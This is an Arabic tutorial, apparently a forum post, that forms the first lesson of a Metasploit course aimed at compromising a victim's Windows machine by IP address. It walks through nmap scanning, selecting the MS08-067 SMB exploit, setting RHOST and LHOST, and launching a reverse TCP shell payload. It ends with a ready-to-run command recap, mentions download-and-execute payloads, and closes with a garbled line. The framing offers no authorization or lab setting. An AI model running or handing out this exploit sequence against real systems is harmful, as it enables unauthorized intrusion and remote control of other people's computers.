بسم الله الرحمن الرحيم
دورة الميتاسبلويت بما قدّرني الله عبر عدة دروس, اولا مقدمة ثم نبدأ بتعريف الميتاسبلويت ومشروعه,,, ثم استغلال ثغراته
((((((متطلبات الدروس:: 1- لغة إنكليزي. 2- معرفة بالدوس والشيل. 3- برنامج nmap -- metasploit -- nc )))
(((ولم أضع صور إلا عند الحاجة)))
انتشر في آخر الأيام برامج الإختراق وتكوين السيرفرات والدمج والتشفير والتلغيم وتلغيم الصفحات وغير ذلك من إختراق عشوائي, اشتغل به الجميع وبدأو يتباهو به وكل واحد يحط
بتوقيعه كم ضحية عنده وهيك .. وتباهو بأنهم يعرفو يشفرو السيرفر وما يخلوه ينكشف ..جيد .. لكن كل هؤلاء ما تقدمو بشي .. كل ما في الأمر ان مبرمج صنع برنامج
ينتج سيرفر تحكم عن بعد والشباب عرفو البرنامج وشفرو السيرفر (مع ان المبرمج دامج البرنامج بحد ذاته)..ثم تأتي تفنن في طرق الإختراق كل واحد على معرفته من دمج مع
دودة .. وبوت نت وغير ذلك .. ونسو الإختراق المستهدف ونسو الثغرات والبفر والفيض وغير ذلك اللي تخليك تخترق بدون ارسال أي شي .. وإن نظام ويندوز مشهور جدا
.. وشخصي لمايكروسوفت,,والنقرتين لعرض الصورة في صفحة مستقلة ان أكثر سكان العالم يستخدمونه,والنقرتين لعرض الصورة في صفحة مستقلة أيضا انه مليء بالثغرات والأخطاء البرمجية,,وبدأ الهاكرز المبرمجون يستغلو هذه الثغرات حتى يتحكمو
عن بعد بجهاز يحوي هذه الثغرة .. لكن في ذلك صعوبة .. من كتابة ثغرة ,, ومعرفة عامة بلغات البرمجة وخاصة بإحدى لغات برمجة النظام مثل السي والأسيمبلي وغيرها
وكانت مقتصرة على المبرمجين .. وكانت الشركات تتنافس لكي تأويهم من أجل النظر بنقاط الضعف الموجودة ..
لكن في الأونة الأخيرة ظهر لنا مشروع الميتاسبلويت والذي يقوم على مبدأ إيجاد الثغرات بنظام محدد ومن أجل إغلاقها .. لكن بدأ الجميع يستغله لإيجاد الثغرات والإختراق عن بعد
ليس من أجل السيكيوريتي اللتي اقتصرت بها الشركات..
فإن مشروع الميتاسبلويت يحوي بداخله تجميع لثغرات تسمح بالتحكم عن بعد ,, وإظهار الثغرات والفيض بالبرامج ونقاط الضعف .. وإن الميتا مشروع تطويري قد تخطى ذلك بحيث
أعطى امكانية التحديث وإضافة الثغرات وصنع ملفات بإمتداد إي أكس إي لكي تمكن بالإتصال العكسي والتنصت و تحكم حسب تعديلاتك واختياراتك,, فإنه يحوي الكثير ,,’’,,
.. بعرف إني طولت وما كان لازم كتر حكي . . . لكن لازم نعرف شو عم نستخدم ..
المهم نأتي للشرح , , الميتا في نسختين .. واحدة تعمل على اللينوكس , والتانية على نظام ويندوز .. وأنا أنصح بعد تجرتي أن تستخدموها على نظام لينوكس لما حدث معي
من أخطاء على الويندوز ..
الميتا يأي معه واجهة رسومية .. وواحدة صفحة ويب .. وكونسول متل الدوس يعني كل شي كتابة مش كبسة ماوس .. و شبيه بالكونسول هو msfcli اللي يكون كل شي
على سطر واحد مثل اختيار الثغرة وتحديد الهدف والمنفذ وكل شي في سطر .. )
المهم أنا أفضل استخدام الكونسول msfconsole ,, ويأتي أيضا msfpayload ,, اللي تمكنك من صنع شل كود بإمتداد إي أكي إي جاهز للنفيذ بعد أن يفتحه الضحية
وأنت تتنصت ..
قبل كل شيئ .. هذا للإختراق المستهدف مش العشوائي .. يعني أيبي الضحية معنا ..
+*+*+*+*+
اولا سأشرح كيف تستخدم المشروع وتستغل الثغرات ,,
, ,
إخوان .. شرح الواجهة الرسومية والمتصفح بايخ .. كلها كبسات ماوس ..
سأشرح الـ msfconsole والشرح رح يكون تحت نظام باك تراك 4 لينوكس ,,
بعد ما نكون دخلنا عليه من /penet/exploits/framework3
./msfconsole
وايضا قبل كل شي .. نسوي تحديث بالأمر svn update .. وننتظر. ثم .,,’’
يفتح البرنامج .. وأرجو ما حدا يتعجب من عدد الثغرات والإختلاف .. فإنه نتيجة للتحديث ..
المهم .. كل ثغرة وعندها خصاصها .. وكيف نعرف أي ثغرة لازم نختار .. هون لازم يكون عندك برنامج nmap وتكون بحثت عن المنافذ المفتوحة وعرفت أي نظام بيستخدم
الضحية(راجع شرح nmap هذا الرابط .. ءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءءء ءء )
لنفرض ان المنفذ 23 مفتوح .. عندها لازم نعرف اننا لازم نستغل ثرة التيلنيت سي بروكسي .. او المنفذ 135 rpc او 445 smb .. والشرح رح يكون على المنفذ 445
لأن أكثر الأجهزة والأنظمة مصابة بهذه الثغرة ..( وخاصة الأن بعد وجود ثغرة في نظام ويندوز 7 وفيستا لل smb وعبر المنفذ 445 أيضا )..
نكتب امر show exploits حتى شوف الثغرات (ملاحظة بالواجهة الرسومية كلها كبسات ماوس) ,, يطلعلنا كتير .. نحنا نختار الثغرة المناسبة حسب المنفذ وبعد ما وجدنا
445 .. نختار الثغرة المشهورة واللي الكل بيحبها windows/smb/ms08_067_netapi << نكت عندها
use windows/smb/ms08_067_netapi
ثم نكتب show options حتى نشوف شو متطلبات الثغرة ..
الثغرة بحاجة للأيبي الشخصي اللي هو LHOST وندخله عبر هذا الأمر set LHOST YOurIP
وأيبي الضحية وهو .. RHOST أيضا ندخله عبر هذا الأمر set RHOST VIctimIP
والمنفذ يكون افتراضي مع الثغرة .. ما في داعي نسويله شي ..
الآن البايلود .. ما هي البايلود ؟ .. هي بعد ان تخترق شو بدك تعمل .. إتصال عكسي, إتصال مباشر, إضافة يوزر, تحميل سيرفر(لمحبي السيرفرات)..
حتى نشوف شو البايلودس نكتب الأمر show payloads . ويطلعنا كتير نختار اللي نريدها .. انا أفضل الmeterpreter .. لكن سنستخدم بالشرح
الإتصال العكسي .. لأني سأضع دروس أخرى عن meterpreter ..
وحتى نختار البايلود نكتب set payload payloadname بإمكاننا أن نختار تحميل وتشغيل download/exec ونضع رابط الباتش . , . او نختار vncinject وهو لحقن ملفات
الدي أل أل وتخليك تشوف سطح المكتب desktop ,,,
لكن انا أفضل الإتصال العكسي كبداية windows/shell/reverse_tcp وهي لعمل إتصال عكسي مع الدوس ..
الهم اخترنا كل شي .. نكتب exploit لتطبيق الثغرة ..
ونحصل على التحكم بالدوس ..
إعادة سريعة
use windows/smb/ms08_067_netapi
set RHOST victimIP
set LHOST yourIP
set payload windows/shell/reverse_tcp
exploit
ملاحظة .. ممكن ما تمشي من أولا مرة .. ممكن ثغرة أخرى . رح تواجه أخطاء لكن ما تيئس . كمل . وكل شي تمام ..
شاهد فيديو اختراق بالميتاسبويت وبالواجهة الرسومية .. وهذا الرابط
اكبس هنا
انتهى الدرس الأول وهذا مبدأ الميتاسبلويت وطريقة عمله .. لأبسط الأمور .. وننتظر الدروس القادمة من صناعة شل كود وتشفيره وملف تنفيذي للتنصت وغير ذلك.. على بركة الله
Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC hgldjhsfg,dj juvdti , 'vdrm hsjyghg eyvhji